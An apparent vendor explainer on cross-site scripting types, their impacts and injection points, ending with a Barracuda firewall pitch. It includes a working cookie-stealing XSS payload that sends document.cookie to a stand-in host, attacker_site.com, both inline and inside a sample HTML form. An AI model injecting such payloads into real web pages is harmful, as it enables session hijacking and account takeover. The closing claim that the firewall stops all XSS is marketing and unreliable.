XSS attacks fall into three categories: Persistent/Stored XSS, Reflected XSS and DOM based XSS.
Persistent XSS attacks store malicious script on the web application server. Any user accessing the application becomes vulnerable to the script executing in their browser.
In DOM based XSS attacks,no new script is injected into a webpage, rather an existing script’s behavior is changed in unintended ways. Typically the change is accomplished by changing a script trusted DOM element.
Client side scripts have complete access to the DOM, and can access or modify any part thereof, including session data theft, cookie manipulation or theft, accessing previous browsing history, etc. For example, an attacker who succeeds in exploiting XSS vulnerabilities can hijack session data of an authenticated user. This allows an attacker to change a user password gaining access to the victim’s account/system.
Even more crucial, XSS attacks can allow the whole client system to be controlled by an attacker. Malicious scripts can silently redirect client browsers to attacker controlled domains serving malware like browser exploit kits (for example, blackhole). These kits profile the user browsers including type, version plugins, etc. They then foist a kitchen sink full of exploits that target known and unknown vulnerabilities, including those in Adobe, Java and Microsoft plugins. Exploit Kits are often first to incorporate the latest threats, lacking vendor patches, and are generally available for a few hundred dollars.
XSS injection is possible through any part of a request that is not properly sanitized before being incorporated into a subsequent response. Typical targets include :
- URL Parameters
- FORM Parameters (GET and POST parameters)
- HTTP Headers
- HTTP Referrer Objects
The attacker has injected the code (<img+src=ImageNotFound.gif+onerror=window.open('http://attacker_site.com/CaptureCookie.cgi?cookie='+document.cookie)>) in the address field to fetch the session cookie of any victim (user) who tries to view the attacker’s profile.
<title>All Form Fields</title>
<TR> <TD>First Name:</TD> <TD>John</TD></TR>
<TR> <TD>Last Name:</TD> <TD>Peter</TD></TR>
<TR> <TD>Address:</TD> <TD><img src=ImageNotFound.gif onerror=window.open('http://attacker_site.com/CaptureCookie.cgi?cookie='+document.cookie)></TD></TR>
<TR> <TD>Gender:</TD> <TD>Male</TD></TR>
The Barracuda Web Application Firewall immediately remediates XSS attacks. It contains comprehensive rule sets to detect plain or obfuscated XSS attacks in incoming requests. Out-of-the-box, the default security policy defeats all XSS attacks without requiring any additional configuration or changes to web application code. Signatures are automatically updated to cover the latest threats.
OWASP Top 10, PCI-DSS, Client Side Attacks